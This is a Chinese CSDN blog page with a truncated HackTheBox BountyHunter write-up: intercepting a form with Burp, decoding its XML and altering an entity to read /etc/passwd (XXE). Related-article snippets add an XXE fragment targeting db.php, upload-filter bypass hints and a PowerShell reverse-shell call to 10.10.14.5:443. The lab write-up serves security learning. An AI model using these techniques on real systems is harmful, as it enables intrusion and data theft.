利用bp抓包,修改xml进行getshell

最新推荐文章于 2024-04-21 00:40:22 发布
最新推荐文章于 2024-04-21 00:40:22 发布
阅读量802 收藏 2
点赞数
分类专栏: GetSheLL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47156475/article/details/119678983
版权

80端口访问
到处点点点,然后发现了一个提交页面
在这里插入图片描述
抓包分析一下
在这里插入图片描述
data里面的数据是先base64加密,然后在url加密的,所以解密后的结果如下:
在这里插入图片描述
尝试修改xml的实体,看看能不能访问/etc/passwd文件,修改后的结果如下:

最低0.47元/天 解锁文章
weixin_47156475
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-Bounty (考点:上传/IIS7.5安全/windows)
冬萍子癸水
04-16 414
nmap 就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点 因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名 扫出 打开看第一个是上传,然后在第二个里读取 经验证,随便传图片,读取成功。那么突破思路就是上传了。 但我试了很多php和aspx,都没用,让人郁闷 只好搜iis7.5 rce up...
hackthebox --BountyHunter
weixin_47156475的博客
08-13 408
文章目录一、信息收集二、getshell三、提权总结 一、信息收集 先扫描一下,看看开启了哪些端口,哪些服务,以及哪些敏感目录 经过一番搜素以及检查,发现并不存在服务漏洞,也没有什么敏感的目录 于是扩大目录的扫描范围 : 发现一个叫db.php的文件以及一个叫resources的文件夹,访问resources文件夹的结果如下: db.php访问没有任何信息 于是老老实实地去80端口访问 到处点点点,然后发现了一个提交页面 抓包分析一下 data里面的数据是先base64加密,然后在url加密
第二课,从bp(Burp suite)抓包开始_bp捉包(2),2024年最新2024最新阿里网络安全面试流程
最新发布
2401_83739472的博客
04-21 888
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!Pitchfork:将每个字典逐一对称匹配,例如A字典的1号位与B字典的1号位匹配,绝不相交匹配。Battering ram:将数据同时填充到多个指定位置,例A字典的数据同时填充到两个位置。Cluster bomb:将每个字典逐一交叉匹配,例如A字典的所有位与B字典的所有位都匹配。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
HackTheBox-BountyHunter WP
h1nt的博客
09-07 522
0x01 信息收集. 端口信息 目录扫描 0x02 打靶 一通乱点后来到一个后台地址: 提交后在burp中能够发现网站和后台通信的数据: 进行URL解码和BASE64解码后发现是xml: 于是可以试试XXE,首先读取文件: 成功了,接下来可以试试读取别的文件: 但是该读什么文件呢,在之前的扫描目录可以发现db.php,于是尝试读取db.php: <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENT
HackTheBox::BountyHunter
aya3t的博客
10-24 352
HackTheBox::BountyHunter
Hack the box靶机 Bounty
菜浪马废的博客
06-03 449
两个页面都是没有权限不能访问 但是也没有扫出来登录页面 投个图 他们换了本字典 我懒得扫了 有过滤 上传了一个shell.php.gif绕过了 找到一篇博客 上传.config 使用nishang的Invoke-PowerShellTcp.ps1的时候 需要在这个文件末尾加入调用 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 然后就可以连接了 没有补丁 那ms15-051 完成 ...
利用burp进行对APP抓包教程
11-04
使用burpsuite对移动app抓包分析 阅读更多 测试移动APP的联网请求,需要获取路径或者参数的时候,使用该工具burpsuite非常方便! 要求: 移动终端和PC处于同一个wlan环境下
抓包工具Burp Suite
05-22
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、...
微信小程序抓包
01-03
至于原理就不过多的进行介绍。 首先,分享一下我整理的所需要的安装包:https://pan.baidu.com/s/1rQGXnBn-ysMwKBkDIxRIfg 提取码:ue7m 环境准备 夜神模拟器 (安卓版本为Android 5.1.1) Xposed JustTrustMe weixin_...
利用BP神经网络进行非线性系统辨识.m
06-03
利用BP神经网络进行非线性系统辨识详细MATLAB代码,详情可参考文章:https://blog.csdn.net/didi_ya/article/details/117520138
利用bp神经网络进行语音信号识别
06-30
总结,利用BP神经网络进行语音信号识别是通过提取MFCC特征,构建和训练神经网络模型,以实现对不同语音的分类。MATLAB提供了一个强大而直观的平台,帮助我们实现这一过程。然而,随着技术的发展,不断探索和学习新的...
Hackthebox:Bounty Walkthrough(not use metasploit)
汗的博客
12-18 338
Bounty是一台Hackthebox的windows靶机,难度3.4
Bp抓包HTTP响应报文
weixin_55710577的博客
06-05 2031
Bp 抓包HTTP响应头
burpsuit抓包
m0_73721944的博客
04-05 4157
我们所说的bp抓包也就是图中的抓包工具,当服务器响应时,即手机与服务器对话时我们可以抓包获取信息,当然也可以对获取的信息进行更改后再发送到手机客户端。首先建立并连接相同的端口,打开burpsuit建立新的端口,要一个没有开放的,也就是不被占用的端口,我们用8081示例。第二种是用自己电脑的代理设置相同的端口,相同的操作可以抓到电脑的信息。改为手动配置代理,端口改为刚刚在burpsuit设置的端口。打开Firefox中的设置,搜索连接设置后进入修改。2.bp抓包的三种形式。1.什么是bp抓包
BurpSuite修改返回数据
浪子燕青的博客
02-23 6826
BurpSuite修改返回数据 再拦截页面的设置选项中勾选拦截服务段数据 ] 访问博客 拦截页面右键选择拦截返回消息 然后forward发送 这里是服务返回的数据,还没有传递到浏览器,可以在这里修改数据 然后在此forward发送 这里的数据就修改好了 顺便提一点burp怎么设置拦截名单,比如不拦截google,firefox站点请求 在这里设置即可 firefox\.com$ firefox\.com\.cn$ mozilla\.com$ mozilla\.net$ mozilla\.org$
Burp Suite修改响应包字段
热门推荐
stybill的博客
10-14 5万+
抓到包之后 设置Action:do intercept -> response to this request 点击Forward即可
burp改返回包(Burp Suite抓包使用步骤)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-20 8297
burp改返回包方法:burp改返回包在抓到包之后, 然后设置Action:do intercept -> response to this request (burp改返回包),点击Forward即可。 下面介绍Burp Suite抓包使用步骤 1、打开Burp.调整Proxy-Intercept-Intercept is on为‘Intercept is off’(拦截器开关) ​2、在火狐中打开需要拦截的网页,(比如同charlse博客里面写到的上传1.txt文件),点击上传文件按钮
burpsuit 截取返回并修改
huitest的博客
03-08 6160
1、配置 2、发送请求后,对请求进行设置 3、截取到返回进行修改后放行
通过修改返回包绕过部分机制的方法的小思考
bangke2340的博客
12-17 948
  在涉及到多步操作的某个业务中,经常通过修改返回包中的某些状态字来绕过部分检测。本文主要分析下为什么修改回应包会影响到服务端实际的业务处理。 1. 原理分析   先看看客户端与服务端是怎么交流的,如下图。   简单的来说,就是客户端发包给服务端,服务端想想怎么处理,处理完以后发个包回去。客户端收到这个回应包,更新一下显示的内容。那么从上面的这个过程中很清楚的知道,修改返...
bp抓包进行fuzz
07-16
如果你想使用抓包工具(如Burp Suite)对应用程序进行模糊测试,可以按照以下步骤进行: 1. 首先,配置你的抓包工具,使其能够拦截和查看应用程序的通信。 2. 启动目标应用程序,并确保它与抓包工具之间建立了正确...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值